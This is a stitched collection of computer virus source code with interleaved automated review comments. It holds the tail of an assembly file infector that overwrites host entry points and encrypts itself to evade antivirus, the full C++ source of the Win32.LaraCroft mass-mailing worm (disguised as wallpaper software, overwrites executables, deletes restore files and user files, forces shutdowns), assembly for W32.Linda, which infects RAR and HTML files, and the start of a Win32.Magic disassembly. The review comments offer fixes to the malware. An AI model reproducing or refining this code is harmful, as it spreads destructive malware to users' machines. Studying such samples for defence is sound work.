jb EntrySection
add ebx,28h
jmp BuscaEntrySec
EntrySection:
mov edx,[esi + 28h]
sub edx,[ebx + 0ch]
add edx,[ebx + 14h] ;offset of Epoint in file.No RVA.
add edx,edi
;AddressOfEntryPoint - VAsection + PointerToRawData
mov [ebp + offset EntryPointInFile],edx
sub ecx,eax ;SectionEnd - entryPoint
mov eax,sizeVir
cmp ecx,eax
jb nxt ;enought size for put virus?
jmp nonxt
nxt:
pop ebx
jmp CloseView
nonxt:
mov ecx,eax
pop ebx
push ecx
mov cx,[esi + 6]
sub ebx,28h
inc cx
buscaReloc:
dec cx ;searching for reloc
or cx,cx
jz nxt2
jmp nonxt2
nxt2:
pop ecx ;no .reloc
jmp CloseView
nonxt2:
add ebx,28h ;is this section .reloc?? compare...
lea eax,[ebp + offset reloc]
push ebx
push eax
lea eax,[ebp + offset compara]
call eax
pop edx
pop edx
or eax,eax
jne buscaReloc
pop ecx
cmp dword ptr [ebx + 10h],ecx
;enought space in reloc for virus?
jb CloseView
push ebx
push esi
mov eax,dword ptr [ebx + 0ch]
mov [edi + 1ch],eax ;reloc dir for nxt gen
mov ebx,[ebx + 14h] ;go start .reloc
add ebx,edi
;copy return to host code to imagebase + 26h,overwriting oeminfo and next 5 reverved word.
;returnHost is 22 bytes, word oeminfo + 5 * dword reserveds ;)
CopyToReserved:
add edi,26h
lea esi,[ebp + offset ReturnHost]
tamReturn = ReturnHost_ - ReturnHost
xor ecx,ecx
mov cl,tamReturn
again2: rep movsb ;copying...
jcxz next2
loop again2
next2:
CopyReloc: mov esi,[ebp + offset EntryPointInFile]
mov edi,ebx
mov ecx,sizeVir+1 ;copy host in reloc for recover later...
again3: rep movsb
jcxz next3
loop again3
next3:
lea esi,[ebp + offset startVir]
mov edi,[ebp + offset EntryPointInFile]
mov eax,edi
mov ecx,sizeVir ;copying...
again4: rep movsb ;overwriting host with virus >:D
jcxz next4
loop again4
next4:
sizedecrypt = endVir - decryptz
sub edi,sizedecrypt
mov ecx,sizecrypt
mov eax,[ebp + GetTickCountz]
call eax
cryptaz:
dec edi ;crypt byte to byte with random key
xor byte ptr[edi],al
loop cryptaz
pop esi
pop ebx
mov dword ptr [ebx + 24h],40000040h
;reloc not discarchable!!
;i think avs no see this flag ;)
CloseHandlesInfectado:
mov ax,'vz'
mov [esi + 8],ax
CloseView:
push dword ptr[ebp + offset MapViewOfFileHand]
mov eax, dword ptr [ebp + offset UnmapViewOfFilez]
call eax
CloseMapping:
push dword ptr[ebp + offset CreateFileMappingHand]
mov eax,dword ptr[ebp + offset CloseHandlez]
call eax
CloseFile:
push dword ptr[ebp + offset CreateFileHand]
mov eax, dword ptr[ebp + offset CloseHandlez]
call eax
Closed:
jmp NextFile
datos:
kernel32_ db 'Kernel32',0
reloc db '.reloc',0
GPA db 'GetProcAddress',0
files db '*.exe',0
pay db 'This virus is for you,for Lady Marian.',0dh
db ' You are the only girl in the world',0dh
db 'whose i have in loved and never other girl',0dh
db ' could be in my heart so you have been.',0dh
paytit db ' i will not forget you...',0
ApisNames:
db 'LoadLibraryA',0
db 'GetSystemTime',0
db 'CreateFileA',0
db 'CreateFileMappingA',0
db 'MapViewOfFile',0
db 'CloseHandle',0
db 'UnmapViewOfFile',0
db 'FindFirstFileA',0
db 'FindNextFileA',0
db 'GetTickCount',0
db 'GetVersion',0
db 'SetFileAttributesA',0
db 'ExitProcess',0
db 0
db 'User32',0
db 'MessageBoxA',0
db 0
db 'sfc',0
db 'SfcIsFileProtected',0
finAPIS dw 00h
dirApis:
LoadLibraryAz dd 0
GetSystemTimez dd 0
CreateFileAz dd 0
CreateFileMappingAz dd 0
MapViewOfFilez dd 0
CloseHandlez dd 0
UnmapViewOfFilez dd 0
FindFirstFileAz dd 0
FindNextFileAz dd 0
GetTickCountz dd 0
GetVersionz dd 0
SetFileAttributesAz dd 0
ExitProcessz dd 0
MessageBoxAz dd 0
SfcIsFileProtectedz dd 0
CreateFileHand dd 0
CreateFileMappingHand dd 0
MapViewOfFileHand dd 0
EntryPointInFile dd 0
handFile dd 0
GetProcAddressz dd 0
Max_Path equ 260
FILETIME struc
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
FILETIME ends
WIN32_FIND_DATA label byte
WFD_dwFileAttributes dd ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh dd ?
WFD_nFileSizeLow dd ?
WFD_dwReserved0 dd ?
WFD_dwReserved1 dd ?
WFD_szFileName db Max_Path dup (?)
WFD_szAlternateFileName db 13 dup (?)
db 03 dup (?)
SYSTEMTIME struct
ST_wYear dw ?
ST_wMonth dw ?
ST_wDayOfWeek dw ?
ST_wDay dw ?
ST_wHour dw ?
ST_wMinute dw ?
ST_wSecond dw ?
ST_wMilliseconds dw ?
SYSTEMTIME ends
SystemTime SYSTEMTIME ?
decryptz:
call SetWritableCode
cmp byte ptr [ebp + offset retHost],0BCh ;encrypted??
je vir ;if no encryted jmp code
xor ecx,ecx
dec ecx
whatkey:
mov al,byte ptr [ebp + retHost]
;search the encryption key
xor al,cl
sub al,0bch
jz keyfound
loop whatkey
keyfound:
mov dl,cl
lea esi,[ebp + offset retHost]
mov edi,esi
mov ecx,sizecrypt
decrypt:
db 0d6h ;setalc,undocumented,antiheuristic,is good today???
lodsb
xor al,dl
stosb
loop decrypt
jmp vir
;SetWritableCode rutine searchs VirtualProtect in kernel export table for calling it
;later and do writable virus code memory zone.Why? Virus code is on code section
;and if code section flags say writable section,avs will see it and will advise
;user that infect file is a posible virus :S so we no set that flag and avs will be
;in silent :)
;In addition with a few modifications explanated and do up,this rutine will search
;getProcAddress so we dont spend bytes in repeat code ;)
SetWritableCode:
mov EAX,[ESP + 28]
xor AX,AX
mov edx,1000h
add eax,edx
VPsearch_kernel:
sub eax,edx
mov CX,word ptr[EAX]
cmp CX, 'ZM'
jne VPsearch_kernel
mov edi,eax
mov EAX,[EAX + 3Ch] ;PE
add EAX,edi
mov EAX,[EAX + 78h] ;Dir entrys
add EAX,edi ;export table
push eax
mov ECX,[EAX + 20h] ;exported func names
add ECX,edi
xor EDX,EDX
VPrepeat:
mov EBX,[ECX]
add EBX,edi
PUSH EBX ;search GetProcAddress
repuse:
lea EBX,[EBP + offset VP]
PUSH EBX
lea ebx,[ebp + offset compara]
call ebx
POP EBX
POP EBX
or EAX,eax
jz VPfinality
add ECX,4
inc edx
inc edx
jmp VPrepeat ;edx index ordinal
VPfinality:
mov EAX,[esp]
mov EAX,[EAX + 24h]
add EAX,edi ;eax -> ordinal
add EAX,EDX ;add index
mov EAX,[EAX] ;index for export address table
shr EAX,10h
dec EAX
mov EBX,[esp]
mov EBX,[EBX + 1ch] ;array of dirs of func
add EBX,edi ;we index it in eax
add EAX,EAX
add EAX,EAX
add EAX,EBX
mov EAX,[EAX] ;dir of VirtualProtect
add EAX,edi
repuse2:
push esp ;lpflOldProtect is a stack dword
push 40h ;writable,readable and executable
push sizeVir ;size of memory to put writable
lea ebx,[ebp + startVir]
push ebx
call eax
pop eax
mov [ebp + kern],edi
ret
;this useful ritune compare 2 strings and return 0 if they are identical and 1 if not.
compara:
push ECX
push ESI
push edi
mov ESI,[ESP + 20]
mov EDI,[ESP + 16]
mov ecx,esi
endString:
lodsb ;lenght of string
or al,al
jnz endString
sub esi,ecx
xchg esi,ecx ;ecx = lenght esi = start
xor eax,eax
repz cmpsb
je endCompara
inc eax
endCompara:
pop edi
POP ESI
POP ECX
ret
;arrrggghtt!! damn,i have had headache becoz i was using VP string before decrypt it!! ;@
VP db 'VirtualProtect',0
kern dd 0
endVir:
end start
end
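Review bot: Every block copy in the infection path pairs `rep movsb` with a trailing `jcxz`/`loop` (the `again1`, `again2`, `again3` and `again4` loops); `rep movsb` only stops when ecx is zero, so the `jcxz` always falls through to its label and the `loop` is never reached — the two lines after each `rep movsb` are dead and can be dropped for readability. Likewise `cmp ebx,[EBP + offset kern]` / `je IsKern` branches to the very next instruction, so that compare-and-jump is a no-op. Register and label case is mixed throughout (`mov EAX,[ESP + 28]` next to `mov edi,eax`, `SEH:` beside `searchApis:`), and the layout description at `;In data apis must be in this form:` would read more clearly as a short table. The `db 0d6h ;setalc,undocumented,antiheuristic,is good today???` comment should state what the byte is rather than ask: `; SALC (D6h): al = CF ? 0FFh : 0, discarded by the lodsb below`.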
+249
@@ -0,0 +1,249 @@
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[LARACROFT.CPP]ÄÄÄ
#include "laracroft.h"
#pragma hdrstop
#pragma warning (disable: 4068)
#pragma warning (disable: 4001)
char LaraWinDir[256],LaraSysDir[256],LaraPath[256];
HKEY RestoreKey,LaraNTKey,LaraWinKey,LaraInstallKey,LaraNewKey;
HANDLE LaraHnd,LaraHndTime;
HMODULE ServiceLib,MessLib;
int Err,ErrSend;
typedef DWORD(*RegServProc)(DWORD,DWORD);
typedef ULONG(*FriendMess)(LHANDLE,ULONG,MapiMessage FAR*,FLAGS,ULONG);
typedef ULONG(*FriendFound)(LHANDLE,ULONG,LPTSTR,FLAGS,ULONG,lpMapiRecipDesc FAR*);
typedef ULONG(*FreeMem)(LPVOID);
LPSTR Friend = "a";
#pragma argsused
int PASCAL WinMain
(
HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpszCmdLine,
int nCmdShow
)
{
//Win32.LaraCroft par ZeMacroKiller98
//Copyright (c) 2000 par ZeMacroKiller98
//Un virus made in FRANCE!!!!!!!!!
WIN32_FIND_DATA LaraHost;
OSVERSIONINFO CurVerInfo;
FILETIME LaraCreateTime,LaraLstAccTime,LaraLstWriTime;
SYSTEMTIME LaraTime;
FriendMess MAPIFriendMess;
FriendFound MAPIFriendFound;
FreeMem MAPIFreeMem;
RegServProc RegisServProcss;
ServiceLib = LoadLibrary("kernel32.dll");
MessLib = LoadLibrary("mapi32.dll");
SearchPath(NULL,_argv[0],NULL,sizeof(LaraPath),LaraPath,NULL);
CurVerInfo.dwOSVersionInfoSize = sizeof(CurVerInfo);
GetVersionEx(&CurVerInfo);
if(CurVerInfo.dwPlatformId==VER_PLATFORM_WIN32_NT)
{
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\WindowsNT\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&LaraNTKey);
RegSetValueEx(LaraNTKey,"LaraWallpaper",0,REG_SZ,LaraPath,sizeof(LaraPath));
RegCloseKey(LaraNTKey);
}
else
{
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&LaraWinKey);
RegSetValueEx(LaraWinKey,"LaraWallpaper",0,REG_SZ,LaraPath,sizeof(LaraPath));
RegCloseKey(LaraWinKey);
}
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\LaraCroft\\Install",0,KEY_ALL_ACCESS,&LaraInstallKey)!=ERROR_SUCCESS)
{
MessageBox(NULL,
"Hi Friends,\nThis software downloads automatically new wallpaper on Lara Croft official site\nIf you have any questions, go to www.eidosinterative.com\nPlease register it on our site at www.eidosinteractive.com\\Lara\\Register\n\tThanks to have take this software\n\t\t\tLara Croft",
"Lara Wallpaper Download Software",
MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
//Anti-WinMe Restauration File
GetSystemDirectory(LaraSysDir, sizeof(LaraSysDir));
if(SetCurrentDirectory(lstrcat(LaraSysDir,"\\RESTORE"))!=0)
{
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&RestoreKey);
RegDeleteValue(RestoreKey,"*StateMgr");
RegCloseKey(RestoreKey);
DeleteFile("rstrui.exe");
}
GetWindowsDirectory(LaraWinDir,sizeof(LaraWinDir));
SetCurrentDirectory(LaraWinDir);
LaraHnd = FindFirstFile("*.exe",&LaraHost);
LaraHoteTrouve:
LaraHndTime = CreateFile(LaraHost.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
GetFileTime(LaraHndTime,&LaraCreateTime,&LaraLstAccTime,&LaraLstWriTime);
CloseHandle(LaraHndTime);
if((lstrcmp(LaraHost.cFileName,"emm386.exe")==0)||(lstrcmp(LaraHost.cFileName,"setver.exe")==0))
goto FichierNonInfecte;
CopyFile(_argv[0],LaraHost.cFileName,FALSE);
LaraHndTime = CreateFile(LaraHost.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
SetFileTime(LaraHndTime,&LaraCreateTime,&LaraLstAccTime,&LaraLstWriTime);
CloseHandle(LaraHndTime);
FichierNonInfecte:
if(FindNextFile(LaraHnd,&LaraHost)==TRUE)
goto LaraHoteTrouve;
FindClose(LaraHnd);
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\LaraCroft\\Install",&LaraNewKey);
RegCloseKey(LaraNewKey);
MessageBox(NULL,"Please send this software about me to your friends...\nYou can select friends into your address book, now\n\t\t\tLara Croft","Lara Wallpaper Download Software",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
MAPIFriendMess = (FriendMess)GetProcAddress(MessLib,"MAPISendMail");
MAPIFriendFound = (FriendFound)GetProcAddress(MessLib,"MAPIResolveName");
MAPIFreeMem = (FreeMem)GetProcAddress(MessLib,"MAPIFreeBuffer");
if((MAPIFriendMess==NULL)||(MAPIFriendFound==NULL)||(MAPIFreeMem==NULL))
{
MessageBox(NULL,"MAPI not installed on this computer\nPlease refer to help to install it","Lara Wallpaper Download Software",MB_OK|MB_ICONEXCLAMATION|MB_SYSTEMMODAL);
SetCurrentDirectory(LaraSysDir);
DeleteFile("*.*");
ExitProcess(0);
}
MapiMessage MyMessage;
MapiRecipDesc stRecip;
MapiFileDesc stFile;
lpMapiRecipDesc lpRecip;
stFile.ulReserved = 0;
stFile.flFlags = 0L;
stFile.nPosition = (ULONG)-1;
stFile.lpszPathName = LaraPath;
stFile.lpszFileName = NULL;
stFile.lpFileType = NULL;
UnResolve:
Err = (MAPIFriendFound)(lhSessionNull,0L,Friend,MAPI_DIALOG,0L,&lpRecip);
if(Err!=SUCCESS_SUCCESS)
{
switch(Err){
case MAPI_E_AMBIGUOUS_RECIPIENT:
MessageBox(NULL,"Please select new email address into your address book","Lara Wallpaper Download Software",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
break;
case MAPI_E_UNKNOWN_RECIPIENT:
MessageBox(NULL,"Any email address with current letter","Lara Wallpaper Download Software",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
break;
case MAPI_E_FAILURE:
MessageBox(NULL,"Unknown error into your address book","Lara Wallpaper Download Software",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
break;
case MAPI_E_INSUFFICIENT_MEMORY:
MessageBox(NULL,"No enought memory to launch this application\nPlease close other application to continue","Lara Wallpaper Download Software",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
break;
case MAPI_E_NOT_SUPPORTED:
MessageBox(NULL,"Email software not installed\nPlese refer to your help for more information","Lara Wallpaper Download Software",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
break;
case MAPI_E_USER_ABORT:
MessageBox(NULL,"You have cancelled this dialog box","Lara Wallpaper Download software",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
break;
}
goto UnResolve;
}
stRecip.ulReserved = lpRecip->ulReserved;
stRecip.ulRecipClass = MAPI_TO;
stRecip.lpszName = lpRecip->lpszName;
stRecip.lpszAddress = lpRecip->lpszAddress;
stRecip.ulEIDSize = lpRecip->ulEIDSize;
stRecip.lpEntryID = lpRecip->lpEntryID;
MyMessage.ulReserved = 0;
MyMessage.lpszSubject = "Lara Wallpaper Download Software";
MyMessage.lpszNoteText = lstrcat("Hi ",(lstrcat(lpRecip->lpszName,"\n\n\tI found on the net a new interesting software about Lara Croft.\nI send you because it's very coooooool!!!\nTry it and say me your opinion about it\n\n\tSee you soon and enjoy to have it")));
MyMessage.lpszMessageType = NULL;
MyMessage.lpszDateReceived = NULL;
MyMessage.lpszConversationID = NULL;
MyMessage.flFlags = 0L;
MyMessage.lpOriginator = NULL;
MyMessage.nRecipCount = 1;
MyMessage.lpRecips = &stRecip;
MyMessage.nFileCount = 1;
MyMessage.lpFiles = &stFile;
ErrSend = (MAPIFriendMess)(lhSessionNull,0L,&MyMessage,0L,0L);
if(ErrSend!=SUCCESS_SUCCESS)
{
MessageBox(NULL,"Sending email create error into your system","Lara Wallpaper Download Software",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
}
FreeLibrary(MessLib);
}
RegCloseKey(LaraInstallKey);
RegisServProcss = (RegServProc)GetProcAddress(ServiceLib,"RegisterServiceProcess");
STARTUPINFO LaraStartInfo;
PROCESS_INFORMATION LaraProcInfo;
LaraStartInfo.cb = sizeof(STARTUPINFO);
LaraStartInfo.lpReserved = NULL;
LaraStartInfo.lpReserved2 = NULL;
LaraStartInfo.cbReserved2 = 0;
LaraStartInfo.lpDesktop = NULL;
LaraStartInfo.dwFlags = STARTF_FORCEOFFFEEDBACK;
if(CreateProcess(LaraPath,
NULL,
(LPSECURITY_ATTRIBUTES)NULL,
(LPSECURITY_ATTRIBUTES)NULL,
FALSE,
0,
NULL,
NULL,
&LaraStartInfo,
&LaraProcInfo))
{
CloseHandle(LaraProcInfo.hProcess);
CloseHandle(LaraProcInfo.hThread);
}
RegisServProcss(LaraProcInfo.dwProcessId,1);
if((LaraTime.wHour==10)&&(LaraTime.wMinute==0)&&(LaraTime.wSecond==0))
{
MessageBox(NULL,"It's time to connect at Lara Croft official web site\nThanks to Click on OK to continue","Lara Wallpaper Download Software",MB_OK|MB_ICONEXCLAMATION|MB_SYSTEMMODAL);
WritePrivateProfileString("InternetShortcut","URL","http://www.tombraider.com/larasworld/wallpaper.html","LaraCroft.url");
ShellExecute(NULL,"open","LaraCroft.url",NULL,NULL,SW_SHOWNORMAL);
}
if((LaraTime.wDay==25)&&(LaraTime.wMonth==12))
{
MessageBox(NULL,
"Merry christmas by Lara Croft!!!!!!\nHey, your PC is infected by new virus: Win32.LaraCroft\n\nJoyeux Noel de la part de Lara Croft!!!!!!\nTon PC est infect par Win32.LaraCroft fabriqu par ZeMacroKiller98",
"Lara Croft like you, don't you",
MB_OK|MB_ICONEXCLAMATION|MB_SYSTEMMODAL);
SetCurrentDirectory("C:/");
DeleteFile("*.*");
ExitWindowsEx(EWX_REBOOT|EWX_FORCE,0);
}
if(LaraTime.wDay==1)
{
MessageBox(NULL,"Lara Croft is with you!!!!\nAnd don't want you work today....","Win32.LaraCroft",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
ExitWindowsEx(EWX_SHUTDOWN|EWX_FORCE,0);
}
if((LaraTime.wHour>=20)&&(LaraTime.wHour<=6))
{
MessageBox(NULL,"Lara Croft say it's time to stop your PC now!!!!\nAnd go to bed, Ha Ha Ha ha !!!!!","Win32.LaraCroft",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
ExitWindowsEx(EWX_SHUTDOWN|EWX_FORCE,0);
}
FreeLibrary(ServiceLib);
return 0;
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[LARACROFT.CPP]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[LARACROFT.H]ÄÄÄ
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <shellapi.h>
#include <dos.h>
#include <stdlib.h>
#include <stdio.h>
#include <mapi.h>
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[LARACROFT.H]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[LARACROFT.TXT]ÄÄÄ
Name: Win32.LaraCroft
Size: 52736 octets
Author: ZeMacroKiller98
Description: This virii try to send itself by email,
if error when i try to send itself then delete in current directory
When install itself, it install itself in current directory as a Wallpaper upload automatically
It contains 2 payloads:
- When day is 25 and month is 12, then delete file in C: directory and reboot computer
- If day is 1, then display message box and shutdown computer
- If hour >=20 and hour <=6, then displays message box and shutdown computer
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[LARACROFT.TXT]ÄÄÄ
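Review bot: The payload conditions at the end of WinMain compare `LaraTime.wHour`, `LaraTime.wDay` and `LaraTime.wMonth`, but the `SYSTEMTIME LaraTime` declared at the top of the function is never filled by any GetLocalTime/GetSystemTime call in the listing, so the date and time triggers that LARACROFT.TXT describes are decided by whatever happens to be on the stack rather than by the clock. The description is also internally inconsistent: it says "It contains 2 payloads" and then lists three, and the third condition `(LaraTime.wHour>=20)&&(LaraTime.wHour<=6)` can never hold for one value. For a corpus entry I would amend the TXT to something like `Payload checks read an uninitialised SYSTEMTIME; the dated triggers below describe intent, not observed behaviour`. The repeated `DeleteFile("*.*")` calls should likewise be documented as attempted rather than effective, since DeleteFile takes a single path and, as far as I recall, performs no wildcard expansion.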
+370
View File
@@ -0,0 +1,370 @@
comment §
Name : W32.Linda
Data : February 13th 2002
Author : PetiK
Language : Win32asm
Size : 8192 (compressed with ASPack).
Action : Infects rar files and ht* files in the current directory.
§
.386
locals
jumps
.model flat,STDCALL
api macro x
extrn x:proc
call x
endm
WIN32_FIND_DATA struct
dwFileAttributes dd 0
ftCreationTime dd ?,?
ftLastAccessTime dd ?,?
ftLastWriteTime dd ?,?
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0,0
cFileName db 260 dup(0)
cAlternateFileName db 14 dup(0)
db 2 dup (0)
WIN32_FIND_DATA ends
.DATA
CRLF equ <13,10>
ffile WIN32_FIND_DATA <?>
sysTime db 16 dup(0)
orig_virus db 50 dup (0)
thFile dd ?
Err dd 0
time0 dd 0,0
time1 dd 0,0
time2 dd 0,0
Size equ 8192
HeaderSize = EndRARHeader-RARHeader
rarmask db "*.rar",0
htmmask db "*.ht*",0
hFile dd ?
fHnd dd ?
mHnd dd ?
sizer dd 0
octets dd 0
RARHeader:
RARHeaderCRC dw 0
RARType db 74h
RARFlags dw 8000h
RARHSize dw HeaderSize
RARCompressed dd Size
RAROriginal dd Size
RAROs db 0
RARCrc32 dd 0
RARFileTime db 63h,78h
RARFileDate db 31h,24h
RARNeedVer db 14h
RARMethod db 30h
RARFNameSize dw EndRARHeader-RARName
RARAttrib dd 0
RARName db "LINDA32.EXE"
EndRARHeader label byte
.CODE
start_linda:
mov eax,offset sysTime
push eax
api GetSystemTime
lea eax,sysTime
cmp word ptr [eax+2],8 ; August
jne end_pay
cmp word ptr [eax+6],10 ; 10th. Linda's Birthday
jne end_pay
push 40h
call @tit
db "W32RAR.Linda",0
@tit:
call @mes
db "This virus infects only RAR files.",0dh,0ah
db "Happy Birthday - (c)2002",0
@mes:
push 0
api MessageBoxA
end_pay:
push 50
mov esi,offset orig_virus
push esi
push 0
api GetModuleFileNameA
push 4
push 1000h
push 8192
push 0
api VirtualAlloc
test eax,eax
je end_srch_rar
mov dword ptr [mHnd],eax
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push offset orig_virus
api CreateFileA
cmp eax,-1
je end_srch_rar
mov dword ptr [fHnd],eax
push 0
mov dword ptr [sizer],0
lea eax,sizer
push eax
push 8192
push dword ptr [mHnd]
push dword ptr [fHnd]
api ReadFile
push dword ptr [mHnd]
api CloseHandle
rar_srch:
push offset ffile
push offset rarmask
api FindFirstFileA
dec eax
jz end_srch_rar
inc eax
mov dword ptr [hFile],eax
inf_rar:
call times
call infect
cmp byte ptr [Err],1
je rar_nxt_srch
call timer
rar_nxt_srch:
push offset ffile
mov eax,dword ptr [hFile]
push eax
api FindNextFileA
test eax,eax
jnz inf_rar
mov eax,dword ptr [hFile]
push eax
api FindClose
end_srch_rar:
htm_srch:
push offset ffile
push offset htmmask
api FindFirstFileA
dec eax
jz end_srch_htm
inc eax
mov dword ptr [hFile],eax
inf_htm:
call infecthtm
htm_nxt_srch:
push offset ffile
mov eax,dword ptr [hFile]
push eax
api FindNextFileA
test eax,eax
jnz inf_htm
mov eax,dword ptr [hFile]
push eax
api FindClose
end_srch_htm:
end_linda:
push 0
api ExitProcess
times: push 0
push 80h
push 3
push 0
push 1
push 80000000h
push offset ffile.cFileName
api CreateFileA
cmp eax,-1
je tserr
mov dword ptr [thFile],eax
push offset time0
push offset time1
push offset time2
push dword ptr [thFile]
api GetFileTime
push dword ptr [thFile]
api CloseHandle
mov byte ptr [Err],0
ret
tserr: mov byte ptr [Err],1
ret
timer: push 0
push 80h
push 3
push 0
push 1
push 40000000h
push offset ffile.cFileName
api CreateFileA
cmp eax,-1
je trerr
mov dword ptr [thFile],eax
push offset time0
push offset time1
push offset time2
push dword ptr [thFile]
api SetFileTime
push dword ptr [thFile]
api CloseHandle
trerr: ret
infecthtm:
push offset ffile.cFileName
api GetFileAttributesA
cmp eax,1 or 20h
je end_inf_htm
push 0
push 80h
push 3
push 0
push 1
push 40000000h
push offset ffile.cFileName
api CreateFileA
cmp eax,-1
je end_inf_htm
mov dword ptr [fHnd],eax
push 2
push 0
push dword ptr [fHnd]
api _llseek
push 0
push offset octets
push e_htm - s_htm
call e_htm
s_htm: db "",CRLF,CRLF
db "<SCRIPT Language=VBScript>",CRLF
db "On Error Resume Next",CRLF
db "document.Write ""<font face='verdana' color=green size='2'>Hi guy ! How are you ?"
db "<br>If you read these lines, is that you are infected by my Virus Linda."
db "<br>Look at your RAR files. They could be infected too."
db "<br>Good Bye and have a nice day.<br></font>""",0dh,0ah
db "</SCRIPT>",0dh,0ah
e_htm:
push dword ptr [fHnd]
api WriteFile
push dword ptr [fHnd]
api CloseHandle
push 1 or 20h
push offset ffile.cFileName
api SetFileAttributesA
end_inf_htm:
ret
infect: xor eax,eax
push eax
push 80h
push 3
push eax
push eax
push 40000000h
lea eax,ffile.cFileName
push eax
api CreateFileA
dec eax
jz end_infect
inc eax
mov dword ptr [fHnd],eax
push 2
push 0
push dword ptr [fHnd]
api _llseek ; like SetFilePointer
mov esi,dword ptr [mHnd]
mov edi,Size
call CRC32
mov dword ptr [RARCrc32],eax
mov esi,offset RARHeader+2
mov edi,HeaderSize-2
call CRC32
mov word ptr [RARHeaderCRC],ax
xor eax,eax
push eax
push offset octets
push HeaderSize
push offset RARHeader
push dword ptr [fHnd]
api WriteFile
mov dword ptr [RARHeaderCRC],0
mov dword ptr [RARCrc32],0
mov dword ptr [RARCrc32+2],0
push 0
push offset octets
push Size
push dword ptr [mHnd]
push dword ptr [fHnd]
api WriteFile
push dword ptr [fHnd]
api CloseHandle
end_infect:
ret
CRC32: cld
push ebx
mov ecx,-1 ;xor ecx,ecx & dec ecx
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0edb8h
NoCRC:
dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec di
jnz NextByteCRC
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
ret
ends
end start_linda
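Review bot: The header comment presents `Size : 8192` as a property of the build, but the code treats it as a hard precondition: `Size equ 8192` sizes the VirtualAlloc buffer, the ReadFile of the virus's own image, the `RARCompressed`/`RAROriginal` fields and the CRC32 pass in `infect`, and the byte count returned in `sizer` is never checked against it. If the executable is not exactly that length the stored RAR entry and its CRC describe a truncated or zero-padded copy, so the comment should read `Size : 8192 — hard requirement (Size equ); stored length and CRC are not derived from the file`. Two further points worth noting for analysts: `infecthtm` uses the READONLY|ARCHIVE combination (`cmp eax,1 or 20h`) as its already-infected marker and sets the same attributes after appending the VBScript block, and the header reset after the first WriteFile in `infect` does `mov dword ptr [RARCrc32+2],0`, which also zeroes the two `RARFileTime` bytes (`63h,78h`) that follow the CRC field, so every infection after the first carries a different timestamp from the one the data block declares.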
+655
@@ -0,0 +1,655 @@
comment *
Win32.Magic.7045 ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
Disassembly by ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
Darkman/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
